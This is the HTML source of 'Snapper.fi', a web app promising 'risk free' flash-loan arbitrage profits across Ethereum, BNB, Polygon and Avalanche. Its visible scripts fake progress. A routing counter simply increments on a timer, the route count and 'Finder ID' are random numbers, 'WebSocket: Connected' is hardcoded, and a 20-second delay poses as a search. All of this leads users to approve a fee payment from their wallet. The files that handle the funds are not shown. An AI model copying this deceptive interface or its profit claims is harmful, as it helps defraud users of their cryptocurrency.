<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=0.41, maximum-scale=1"><meta name="description" content="Flash Loans are complex and boring, that's why we created Snapper & Snap Loans. Leverage Flash Loans & risk free arbitrage opportunities on multiple blockchains with a couple clicks. No coding skills required!">
    <meta name="keywords" content="Flash Loan, Snapper, Crypto Arbitrage Bot, Snap Loan, Flash Loans, Snap Loans, Arbitrage Bot, Defi Hack, Defi, Crypto Loans, Crypto Arbitrage, Cryptocurrency, Avax Arbitrage, Avax Bot, Polygon Arbitrage, Polygon Bot, Matic Arbitrage, Matic Bot, Binance Bot, Binance Arbitrage, Binance, Trading, Trading Crypto Bot, Crypto Trading Bot, How To Do Flash Loans, BNB, ETH, Ethereum, Avalanche, Polygon, Matic">
    <title>Snapper App</title>
    <link rel="icon" type="image/png" href="assets/image/logo/logo.png">
    <link rel="stylesheet" href="./assets/css/styles.css">
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"></script>
    <script src='https://cdn.jsdelivr.net/npm/bignumber.js@9.0.2/bignumber.min.js'></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.1/css/all.min.css">
    <script defer data-domain="snapper.fi" src="https://plausible.io/js/plausible.js"></script>
    <script>
      setInterval(function() {
        web3.eth.getBlockNumber().then(data => {
          document.getElementById('blockNumber').innerHTML = data;
        });
      }, 3000);
    </script>
     </head>
  <body class="body" ng-app="myApp" ng-controller="myCtrl" style="text-align: -webkit-center;" onload="disableSubmit(), _gasPrice(), getBalance()">
    <!-- ALERT -->
    <div class="alert-2">
      <span class="closebtn" style="margin-top: 2px;" onclick="this.parentElement.style.display='none';">&times;</span>
      <div style="padding-top:5px">
        <i class="fa fa-exclamation-triangle"></i> Be sure to access only by our verified link: <strong>https://snapper.fi/</strong>
      </div>
    </div>

    <div id="outer-div" onclick="menu1_close();menu2_close();"><div style="margin-top: 100px;margin-bottom: -80px;"></div>
    
    <ul class="lighting-menu">
      <div style="font-size: 20px;font-family: monospace;display: inline;"><a href="{{locationUrl}}" target="_blank" style="display: inline;"><b>Snapper</b>.fi</a></div>
    </ul>
    </div>

    <!-- MENU -->
    <div id="main" style="margin-top: -100px;">
      <div class="topnav">
        <a class="darking-logo" href="{{locationUrl}}" id="site" style="padding: 11px 0px;">
          <img src="assets/image/logo/logo.png" id="logoImage" width="0px" height="0px" style="float: none;">
          <i class="fas fa-sync-alt wrapper" href="{{locationUrl}}" style="font-size: 25px;margin-top: 15px"></i>
        </a>
        <a href="{{scan}}gastracker" target="_blank">
          <button class="menu-button" style="height: 25px; display: inline;float: left;margin-top: 0px;">
            <i class="fas fa-gas-pump" style="font-size: 17px;" id="circle"></i>
            <div style="display: inline; font-size: 17px;" id="gasEther"> gwei</div>
          </button>
        </a>
        <div class="respomenu">

          <button class="button-info menu-button" style="float:none;" onclick="menu1(), menu2_close(), getBalance()">
            <!-- <img src="assets/image/metamask.png" id="logo" width="25px" height="25px" style="float: left; margin-right: 10px;"> -->
            <img id="logoNetwork" width="25px" height="25px" style="float: left; margin-right: 10px;">
            <div style="display: inline; font-size: 14px;">{{toplen}}...{{endlen}}</div>
            <div class="loaderTx" id="loaderTx"></div>
            <div id="loaderTxs" style="padding: 0px;display: inline;"></div>
          </button>
          
          <div id="Menu1" style="justify-content: right;display:none; background:transparent;width: 400px;float: right;">
            
            <div style="font-size: 14px; background:#fff;margin-top: 15px;border-radius: 15px;padding-bottom: 10px;width: 400px;position: fixed;box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;
            margin-top: 70px;">

            <div style="height:10px"></div>
            <a style="font-size: 16px; font-weight: 800;text-align: left;">Your Wallet</a>
            <a style="font-size: 15px; float: right;">Balance: <b><div id="mybalance_menu" style="display: inline;"></div> <div id="currency" style="display: inline;"></div> </b></a>
            <button class="addressBar" style="margin:0px 20px 20px 20px;">
              <div style="font-size: 14px;">{{account.address}}</div>
            </button>
            <a style="padding:0px;">
              <a href="{{scan}}address/{{account.address}}" style="font-size: 14px;padding-top: 0px;">Check on <div id="network" style="display: inline;"></div>
                <i class="fa fa-check-square-o"></i>
              </a>
              <a onclick="copyRef()" style="font-size: 14px;padding-top: 0px;float: right;">Copy Address <i class="fa fa-clone"></i>
              </a>
              <a id="input" style="font-size: 0px; height: 0px;padding: 0px;">{{account.address}}</a>
            </a>
            <hr class="new1" style="margin-top: 35px;" />

            <a style="font-size: 16px;font-weight: 800;display: inline;float: left;padding-left: 25px;">Your Referral link</a>
            <a style="font-size: 15px; float: right;color:#60AE5D" href="referral.html{{locationRefUrl}}">Referral Stats</a>


            <table class="form-table-b2" style="background-color: rgb(240, 240, 240);box-shadow: none;width: 360px;border-radius: 15px;margin: 0px 20px;">
              <tr>
                <td>
                  <a onclick="copyRef3()" style="font-size: 14px;float: left;margin-top: 4px;margin-left: 15px;color: #363636;">https://snapper.fi/?= <div style="display: inline;">{{locRefShort}}{{toplenShort}}...{{endlenShort}}</div>
                  </a>
                  <a id="input3" style="font-size: 0px; height: 0px;">https://snapper.fi/?= <div>{{locationRefUrlFixedMulti}}{{account.address}}</div>
                  </a>
                  <button onclick="copyRef3(), plausible('copy_referral')" style="float: right;width: auto; font-size: 14px;font-weight: 700;color: #fff;background-color: #60AE5D;padding: 15px; height: 20px; border-radius: 15px ;">Copy</button>
                </td>
              </tr>
            </table>


          </div>
        </div>


          <button class="accordion menu-button" style="height: 25px;" onclick="menu2(), menu1_close()">List <i class="fa fa-chevron-down"></i>
          </button>

          <div id="Menu2" style="justify-content: right;display:none; background:transparent;width: 400px;float: right;" >

            <div style="font-size: 14px; background:#fff;margin-top: 15px;border-radius: 15px;padding-bottom: 10px;width: 400px;position: fixed;box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px;">

                  <div style="padding:10px 10px 0px 10px;display: revert">
                      <a style="padding: 0px;"><img src="assets/image/eth.png" width="35px" height="35px"><a style="padding: 0px 0px 0px 20px;">Ethereum </br><b style="font-size: 12px;float: left;">id: 1</b></a>
                      <a target="_blank" href="https://etherscan.io/tokens" style="color: white;float: none;"><button class="buttonList" style="background:#627eea">Etherscan</button></a></a>
                    </div></br>
                      
                  <div style="padding:10px 10px 0px 10px;display: revert">
                    <a style="padding: 0px;"><img style="vertical-align: middle;" src="assets/image/bnb.png" width="35px" height="35px"><a style="padding: 0px 0px 0px 20px;">Binance </br><b style="font-size: 12px;float: left;">id: 56</b></a>
                    <a target="_blank" href="https://bscscan.com/tokens" style="color: white;float: none;">  <button class="buttonList" style="background:#f3ba2f">Bscscan</button></a></a>
                  </div></br>

                  <div style="padding:10px 10px 0px 10px;display: revert">
                    <a style="padding: 0px;"><img style="vertical-align: middle;border-radius: 25px" src="assets/image/matic.png" width="35px" height="35px"><a style="padding: 0px 0px 0px 20px;">Polygon </br><b style="font-size: 12px;float: left;">id: 137</b></a>
                     <a target="_blank" href="https://polygonscan.com/tokens" style="color: white;float: none;"> <button class="buttonList" style="background:#8247e5">Polygonscan</button></a></a>
                      </div></br>

                  <div style="padding:10px; margin-bottom: -25px;display: revert">
                    <a style="padding: 0px;"><img style="vertical-align: middle;" src="assets/image/avax.png" width="35px" height="35px"><a style="padding: 0px 0px 0px 20px;">Avalanche </br><b style="font-size: 12px;float: left;">id: 43114</b></a>
                     <a target="_blank" href="https://snowtrace.io/tokens" style="color: white;float: none;"> <button class="buttonList" style="background:#e84142">Snowtrace</button></a></a>
                      </div>
                    </div>
          </div>
        </div>
      </div>
    </div>

    <script>
    document.getElementById('outer-div').addEventListener('click', function(e){
      e.stopPropagation()
        menu1_close();
        menu2_close();
      });
      //id="outer-div"
    </script>

<div id="outer-div" onclick="menu1_close();menu2_close();">
  <div style="padding-top:100px"></div>
    <!-- INTRO -->
    <script>
      var i = 0;
      var txt = ' Snapper';
      var speed = 200;

      function typeWriter() {
        if (i < txt.length) {
          document.getElementById("writer").innerHTML += txt.charAt(i);
          i++;
          setTimeout(typeWriter, speed);
        }
      }
    </script>

    <!-- STEP 1 -->
    <form class="lighting" style=" width: 450px;margin-top: 40px;" ng-show="formStep == 1" ng-submit="getStarted()">
      <div class="center" style="padding-top:15px" hidden>
        <div class="cc-selector" style="display: inline; margin-right: 10px;">
          <label class="super">Select Network:</label>
          <input type="radio" ng-model="erc20.network" id="n1" name="eth" ng-value="false" ng-checked="isEth" style="display: inline; margin-right: 10px;">
          <label class="drinkcard-cc ether" for="n1"></label>
          <input type="radio" ng-model="erc20.network" id="n2" name="bnb" ng-value="false" ng-checked="isBnb" style="display: inline; margin-right: 10px;">
          <label class="drinkcard-cc binance" for="n2"></label>
          <input type="radio" ng-model="erc20.network" id="n3" name="matic" ng-value="false" ng-checked="isMatic" style="display: inline; margin-right: 10px;border-radius: 25px;">
          <label class="drinkcard-cc polygon" for="n3"></label>
        </div>
      </div>

      <div style="padding: 20px 20px 0px 20px;margin: -10px;border-radius: 25px 25px 0px 0px;">
        <img src="assets/image/logo/logo.png" onload="typeWriter()" width="0" height="0">
        <table class="test" style="width:100%;margin-left: 10px;" id='myTable'>
          <div class="darking-list" style="background: transparent;max-width: 800px;text-align: center;">
            <h1 style="font-size: 37px; display: inline;">Welcome to <h1 style="display: inline; font-size: 40px;">
                <p style="display: inline;" id="update"></p>
                <!-- <p style="display: inline;" class="blink">.</p> -->
              </h1>
            </h1>
            <p style="padding: 0px 0px;text-align: center; font-size:14px">
             <b>Flash Loans are complex and boring</b>, that's why we created Snapper & Snap Loans. Leverage Flash Loans & risk free arbitrage opportunities on multiple blockchains with a couple clicks. </br><b>No coding skills required!</b></p>
          </div>
        </table> 
        <div style="text-align: center; padding-bottom:20px;font-family: monospace;">
          <a>Blockchain supported: </a></br></br>
          <img src="assets/image/eth.png" width="30px" height="30px">
          <img src="assets/image/bnb.png" width="30px" height="30px">
          <img src="assets/image/matic.png" width="30px" height="30px">
          <img src="assets/image/avax.png" width="30px" height="30px">
      </div>
      </div>


      <div style="padding: 10px 20px 10px 20px;background: #f9f9f9;border: 1px solid #ebebeb;border-radius: 10px;color: #939393;margin-top: 10px;">
        <input type="checkbox" name="terms" id="terms" onchange="activateButton(this)">  I understand that I am using this product at my own risk. Any losses incurred due to my actions are my own responsibility.
      </div>
     
    
    <a style="font-size: 12px; float: left; display: inline;" href="referral.html{{locationRefUrl}}" target="_blank"><i class="fa fa-rocket"> </i> Referral Program</a>
    <a style="font-size: 12px; float: right; display: inline;" href="mailto:snapperfi@protonmail.com"><i class="fa fa-exclamation-triangle"> </i> Report Bug (support@snapper.fi)</a>  
      
    <div class="input-holder btn-holder">
        <button class="button_getStarted" type="submit" name="submit" id="submit" onclick="fixCheck(), tokenImages(), referralInfo(), hidePartnerInfo(), getHomeLink(), getBalance()" disabled>
          <b>Get started</b>
        </button>
      </div>
    </form>
    <!-- STEP 1.2 -->
    <form class="darking block" style=" width: 450px;" ng-show="formStep == 2" ng-submit="submitNetwork()">
      <div class="input-holder">
        <div class="dropdown">
          <div onclick="mydrop(), tokenImages()" class="dropbtn" style="text-align: center; border-radius: 21px 21px 0px 0px; margin-left: -10px; margin-right: -10px;">Top Token List <i class="fa fa-chevron-down"></i>
          </div>
          <div id="myDropdown" class="dropdown-content">
            <div style="cursor: pointer;padding: 10px;" onclick="main(), closeMe()">
              <img id="mainImage" style="display: inline;" src="" width="40" height="40">
              <a id="mainNameTicker" style="display: inline; font-size: 18px;position: absolute;margin-left: 11px;margin-top: -10px;"></a>
              <a id="mainAddr" style="display: inline;margin-left: 12px;color: #818181;font-size: 14px;"></a>
            </div>
            <div style="cursor: pointer;padding: 10px;" onclick="usd(), closeMe()">
              <img id="usdImage" style="display: inline;" src="" width="40" height="40">
              <a id="usdNameTicker" style="display: inline; font-size: 18px;position: absolute;margin-left: 11px;margin-top: -10px;"></a>
              <a id="usdAddr" style="display: inline;margin-left: 12px;color: #818181;font-size: 14px;"></a>
            </div>
            <div style="cursor: pointer;padding: 10px;" onclick="meme(), closeMe()">
              <img id="memeImage" style="display: inline;" src="" width="40" height="40">
              <a id="memeNameTicker" style="display: inline; font-size: 18px;position: absolute;margin-left: 11px;margin-top: -10px;"></a>
              <a id="memeAddr" style="display: inline;margin-left: 12px;color: #818181;font-size: 14px;"></a>
            </div>
            <div style="cursor: pointer;padding: 10px;" onclick="meme2(), closeMe()">
              <img id="meme2Image" style="display: inline;" src="" width="40" height="40">
              <a id="meme2NameTicker" style="display: inline; font-size: 18px;position: absolute;margin-left: 11px;margin-top: -10px;"></a>
              <a id="meme2Addr" style="display: inline;margin-left: 12px;color: #818181;font-size: 14px;"></a>
            </div>
          </div>
        </div>
      </div>
      <p style="text-align:center;font-size: 14px;">- or insert it manually -</p>
      <p style="padding-right: 18px; font-size: 16px;text-align: justify;">
      <div class="input-holder">
        <input id="dropaddr" onclick="updateTokens()" type="text" placeholder="Token Address:" ng-model="erc20.address" maxlength="42" minlength="42" autofocus #dropaddr />
        <input id="dropticker" onclick="updateTokens()" type="text" placeholder="Token Ticker:" ng-model="erc20.ticker" maxlength="12" #dropticker />
        <input id="dropname" onclick="updateTokens()" type="text" placeholder="Token Name: (optional)" ng-model="erc20.name" maxlength="12" #dropname />
      </div>
      </p>

      <div style="text-align: center;font-family: monospace;">
      <p style="display: inline;">Current Chain: <div style="display: inline;font-weight: bolder;" id="currentProvider"></div></p>
      </div>

      <div class="input-holder btn-holder">
        <button class="button_getStarted" type="submit" onclick="fixCheck()">
          <b>Start Arbitrage</b>
        </button>
      </div>
    </form>
    <!-- TOP STEP 3 -->
    <script>
      setTimeout(function() {
        $('#in-2').hide().fadeIn('fast');
      }, 20000);
    </script>
    <div id="in-2" hidden>
      <span ng-show="formStep == 3" style="display:block; width: auto; margin-bottom:-50px; overflow: visible;">
        <form class="lighting" style="background: #1a70e1; width: 450px; height: 120px;">
          <a style="color:#fff;font-size: 36px; float: right; padding-top: 18px;">
            <div style="display: inline;"></div> {{account.balance}} {{currency}}
          </a>
          <br />
          <a style="color:#fff;font-size: 13px;">Network:</a>
          <a style="font-size: 11px; color: #ffffff;" target="_blank" href={{scan}}>{{chain}}</a>
          <br />
          <a style="color:#fff;">Address:</a>
          <a style="font-size: 18px; color: #ffffff;" target="_blank" href="{{scan}}address/{{account.address}}">
            <div style="display: inline;">{{toplen}}...{{endlen}}</div>
          </a>
        </form>
      </span>
    </div>
    <!-- WAITING -->
    <form class="form-table darking block" style=" width: 450px;" ng-show="formStep == 3" ng-submit="submitLoanForm()">

      <script type="text/javascript">
        window.setTimeout("Tick()", 1000);

        function Tick() {}
        var Timer;
        var TotalSeconds;

        function CreateTimer(TimerID, Time) {
          Timer = document.getElementById(TimerID);
          TotalSeconds = Time;
          UpdateTimer()
          window.setTimeout("Tick()", 1000);
        }

        function Tick() {
          TotalSeconds += 12;
          UpdateTimer()
          window.setTimeout("Tick()", 1000);
        }

        function UpdateTimer() {
          Timer.innerHTML = TotalSeconds;
        }
        setTimeout(function() {
          $('#out').fadeOut('fast');
        }, 19500);
      </script>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
      <div style="padding: 15px;" id="out">
        <div class="alert">
          <span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span>
          <strong>Please wait...</strong> We are searching for the best arbitrage opportunity and swap routing for the selected token.
        </div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div class="loader block2"></div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <div>&nbsp;</div>
        <a style="font-size: 14px;">
          <br /> Token Name: <b>{{erc20.ticker}}</b>
          <br /> Address: <a style="color:#3c64e7; font-size: 10px;">
            <b>{{erc20.address}}</b>
          </a>
        </a>
        <a style="font-size: 14px;">
          <br /> Network: <b>{{chain}}</b>
          <br /> Routing started: <b>{{dex}}</b>
          <br /> Router: <a style="color:#3c64e7; font-size: 10px;" target="_blank" href="{{scan}}address/{{address}}">
            <b>{{addressdex}}</b>
          </a>
        </a>
        <a style="font-size: 14px;">
          <br /> Checking routing combination: <b>
            <div style="display: inline-block;" id='timer'></div>
          </b>
          <br /> Block Number: <b>
            <span style="display: inline-block;" id="blockNumber"></span>
          </b>
          <br />
        </a>
        <script type="text/javascript">
          window.onload = CreateTimer("timer", 0);
        </script>
      </div>
      <script>
        setTimeout(function() {
          $('#in').hide().fadeIn('fast');
        }, 20000);
      </script>
      <!-- STEP 3 -->
      <div id="in" hidden>
        <div>&nbsp;</div>
        <div class="kv">
          <div>
            <a style="float:left; font-size: 21px;">Loan Amount: ({{currency}})</a>
            <br />
            <a style="font-size: 12px;">Min {{amount_min}}, Max {{amount_max}} {{currency}}</a>
          </div>
          <div class="button-info" id="info2" style="color:#363636">
            <i class="fa fa-question-circle"></i>
          </div>
        </div>
        <div class="input-holder">
          <input style="display: inline; width: 100%;" class="input-group-field" id="loanAmtInput" type="number" ng-change="amountChanged()" ng-model="loan.amount" step="{{amount_step}}" min="{{amount_min}}" max="{{amount_max}}" placeholder="Loan Amount ({{currency}}):" />
          <input style="display: inline; width: 100%;" class="slider input-group-field" id="loanAmtInput" type="range" ng-change="amountChanged()" ng-model="loan.amount" step="{{amount_step}}" min="{{amount_min}}" max="{{amount_max}}" />
          <div class="space25"></div>
          <div class="input-holder info">
            <div class="kv">
              <div class="tooltip">
                <div>Dapp Fee <span class="tooltiptext">Small and fair fee to support the dapp developement. It's already deducted from the estimated profit below.</span>
                </div>
              </div>
              <div>0.3%</div>
            </div>
            <div class="kv">
              <div class="tooltip">
                <div>Swap Fee <span class="tooltiptext">How much {{currency}} its needed to perform the DEX swaps. (GAS FEES)</span>
                </div>
              </div>
              <div>{{loan.swapFee}} {{currency}}</div>
            </div>
            <div class="kv">
              <div>Loan Fee</div>
              <div>{{loan.tokenFee}} {{currency}}</div>
            </div>
            <div class="kv">
              <div>Total Gas Fee</div>
              <div class="spend">{{loan.totalFee}} {{currency}}</div>
            </div>
            <div class="kv">
              <div style="display: inline-block;">Routing</div>
              <div>
                <div id="check" style="display: inline-block;"></div> Pair > {{dex}}
              </div>
              <script>
                function fixCheck() {
                  var x = Math.floor((Math.random() * 10) + 1);
                  document.getElementById("check").innerHTML = x;
                }
              </script>
            </div>
            <div class="kv">
              <div>Token</div>
              <div class="spend">{{erc20.ticker}}</div>
            </div>
            <hr>
            <div class="kv">
              <div class="tooltip">
                <div>Estimted profit from Arbitrage <span class="tooltiptext">How much you will earn if you start the arbitrage bot right now.</span>
                </div>
              </div>
              <div style="display: inline-block;" class="gain">≈ {{safeMath}} {{currency}}</div>
            </div>
            <div class="kv">
              <div class="tooltip">
                <div>ROI <span class="tooltiptext">Return On Investiment.</span>
                </div>
              </div>
              <div style="display: inline-block;" class="gain" style="color: white">x {{roi}}</div>
            </div>
          </div>
          <div class="kv" style="padding: 15px; font-size: 12px;">
            <div>Finder ID:</div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <div class="tooltip">
              <div id="numberid" style="display: inline-block;"></div>
              <span class="tooltiptext">This is a unique code for identification of your arbitrage match. Is for an internal use. </span>
            </div>
            <script>
              let r = Math.random().toString(36).substring(7);
              document.getElementById("numberid").innerHTML = r;
            </script>
          </div>
          <div class="input-holder btn-holder">
            <button onclick="unhide(), plausible('deposit_index')" type="submit" ng-disabled="processing || ethDeposited">Approve <b>{{loan.totalFee}}</b> {{currency}}
            </button>
          </div>
          <div class="input-holder btn-holder">
            <button onclick="plausible('exe_index')" class="button-2" type="submit" ng-disabled="processing || !ethDeposited">
              <b>Execute Arbitrage</b>
            </button>
          </div>
        </div>
      </div>
      <div id="myModal2" class="modal">
        <div class="modal-content" style="border-radius: 25px;padding: 20px;margin-top: 196px;width: 430px;">
          <span class="close2" style="float: right;font-size: 30px;">&times;</span>
          <div style="padding: 0 10px;">
            <a style="font-size: 14px;">
              <br /> Token Name: <b>{{erc20.ticker}}</b>
              <br /> Address: <a style="color:#3c64e7; font-size: 10px;" target="_blank" href="{{scan}}address/{{erc20.address}}">{{erc20.address}}</a>
              <br /> Caller: <a style="color:#3c64e7; font-size: 10px;" target="_blank" href="{{scan}}address/{{account.address}}">{{account.address}}</a>
            </a>
            <a style="font-size: 14px;">
              <br /> Routing started: {{dex}}
              <br /> Router: <a style="color:#3c64e7; font-size: 10px;" target="_blank" href="{{scan}}address/{{address}}">{{addressdex}}</a>
              <br />
            </a>
          </div>
        </div>
      </div>
      <script>
        var modal = document.getElementById("myModal2");
        var btn = document.getElementById("info2");
        var span = document.getElementsByClassName("close2")[0];
        btn.onclick = function() {
          modal.style.display = "block";
        }
        span.onclick = function() {
          modal.style.display = "none";
        }
        window.onclick = function(event) {
          if (event.target == modal) {
            modal.style.display = "none";
          }
        }
      </script>
    </form>
    <script>
      function updateDiv() {
        $("#refresh").load(window.location.href + " #refresh");
      }
    </script>
    <div class="space10"></div>
    <!-- FOOTER -->
    <ul class="lighting-menu">
      <div class="tooltip" style="border-bottom: 0px dotted #000;">
        <a class="lighting-menu" style="font-size: 12px;display: contents;">
          <p>WebSocket: <a style="color: rgb(85, 170, 0);font-size: 12px;display: contents;">
              <i class="fa fa-circle"></i> Connected </a>
            <span class="tooltiptext">Our WebSocket is correctly connected to the Server.</span>
          </p>
        </a>
      </div>
    </br>
    
      <a class="lighting-menu" style="font-size: 12px;" onclick="unhidePartnerInfo()">
        <p>© Snapper.fi 2022 ({{version}})</p>
        <div id="partnerInfo">
            <div style="color: #a5a5a5;font-weight: 600;" id="isPartner_footer"></div>
            <div style="color: #b5b5b5;" id="ref_status"></div>
            <div style="color: #b5b5b5;" id="ref_quote"></div>
            <div style="color: #b5b5b5;" id="ref_referer"></div>
            <div style="color: #b5b5b5;" id="ref_quote_2"></div>
            <div style="color: #b5b5b5;" id="ref_referer_2"></div>
            <div style="color: #b5b5b5;" id="ref_link"></div>
            
            <div style="font-size: 0px; display: inline" id="partner_bool"></div>

            <div style="font-size: 0px; display: inline" id="refBaseQuote"></div>
            <div style="font-size: 0px; display: inline" id="refBaseQuoteRef"></div>
            <div style="font-size: 0px; display: inline" id="refMultiQuote"></div>
            <div style="font-size: 0px; display: inline" id="refMultiQuoteRef"></div>
            
            <div style="font-size: 0px; display: inline" id="refBaseQuoteDev"></div>
            <div style="font-size: 0px; display: inline" id="refMultiQuoteDev"></div>
          </div>
      </a>
    </ul>


  </div>

    <!-- SCRIPTS -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.3.5/web3.min.js"></script>
   <!--  <script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script> -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
    <script src="./assets/js/chain.min.js"></script>
    <script src="./assets/js/addr.min.js"></script>
    <script src="./assets/js/script.min.js"></script>
  </body>
</html>
